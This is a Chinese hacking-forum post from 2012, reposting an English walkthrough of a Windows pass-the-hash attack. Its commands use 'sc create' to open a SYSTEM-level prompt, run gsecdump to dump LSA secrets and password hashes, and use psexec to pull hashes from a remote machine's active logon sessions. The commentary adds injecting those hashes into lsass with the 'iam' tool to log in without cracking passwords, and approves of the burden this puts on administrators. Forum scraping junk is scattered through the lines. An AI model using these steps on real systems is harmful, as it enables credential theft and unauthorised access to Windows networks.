找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1970|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:
9 i  \2 L  F0 x& o
& d# e4 O/ {& gC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
; P7 ]1 D' M3 |$ V" j[SC] CreateService SUCCESS
9 j/ d! v" p% w- n, u
- a* j+ w8 Y6 w- C) [. nC:\>sc start shellcmdline8 j2 k" |1 v# K6 t* G# u
[SC] StartService FAILED 1053:5 e8 X/ h$ }  x: u- H  {1 p

7 ^, U: i" C9 K/ Q7 C: y2 dThe service did not respond to the start or control request in a timely fashion.
7 O; M$ D' O! ^4 F4 j0 d) F
. O% r7 j* k( q3 g* [( @C:\>sc delete shellcmdline
5 d& }, o+ r+ w0 Q% o& h; T# b% f[SC] DeleteService SUCCESS
/ R- i) f1 T7 A2 o1 B" m! p# _$ W& ]+ [( I: e' ?
------------3 ]4 C1 A4 Q6 j# m+ W4 J

; ^+ g4 M" @, o/ e+ Y0 e, w/ h$ UThen in the new DOS window:
( b) ]. b* H! o+ P+ |# Y0 N' L% j7 k2 C$ X9 ^( }' s
Microsoft Windows XP [Version 5.1.2600]
3 g9 P) U) A/ Z/ j- @5 i(C) Copyright 1985-2001 Microsoft Corp.0 A. J4 F" Q4 J) Y* x

, _( [' t* y  W; _- g8 P/ K3 UC:\WINDOWS\system32>whoami
, e$ R( K# e9 Y$ O1 TNT AUTHORITY\SYSTEM$ c. P  j1 P3 U- @: [
6 C! @$ |& j1 f9 X
C:\WINDOWS\system32>gsecdump -h
' D& j; R& Q+ [gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
) j  `- H- T  J# ]! ?0 p" Musage: gsecdump [options]
- v/ w! D. [3 j( F5 x! j- T4 j- \# s; ^0 y3 B! F
options:5 K4 j/ F# z6 ]. n9 k/ F8 o1 |3 ]
-h [ --help ] show help+ w2 Z( z* \+ l1 s0 |; O" [+ D) k8 e% h
-a [ --dump_all ] dump all secrets
7 g( g  A% _* x' G-l [ --dump_lsa ] dump lsa secrets
# S+ V: M& K  W4 X-w [ --dump_wireless ] dump microsoft wireless connections' s' u( y1 ?- j5 u$ ^
-u [ --dump_usedhashes ] dump hashes from active logon sessions8 W$ V' r; S) f7 D8 g
-s [ --dump_hashes ] dump hashes from SAM/AD
+ P; |" u" O  y& Q; k
5 I/ Q  N  Z+ v$ m" yAlthough I like to use:
$ x7 w# D4 C# N8 {; B7 Y2 E1 \0 L* m/ V" f9 D  K
PsExec v1.83 - Execute processes remotely
( a! ^: ^% `8 x- RCopyright (C) 2001-2007 Mark Russinovich
# x, T. b( [! d- }! E0 Q6 vSysinternals - 链接标记[url]www.sysinternals.com[/url]. b1 t. }" ~, h' f6 w' t
/ F) G1 Q, Z( n& M0 N! p
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
/ m; ]9 g% ?: R$ x- x4 n% r
6 s8 X  M- Y6 }' y% vto get the hashes from active logon sessions of a remote system.
- v* j0 j. P. ^# j; r. M* ~% a( r: i* {3 i
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.2 O' B) w- k5 k6 Y: H% K6 k1 O

' L1 p) n( \& K提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
& h3 y& ?8 E7 j- w% J6 I  z原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]5 I0 s% {' D5 x
8 T2 Q/ _9 t  h4 P! @% ^) I
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。1 t! ~& z* p% r# W. w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表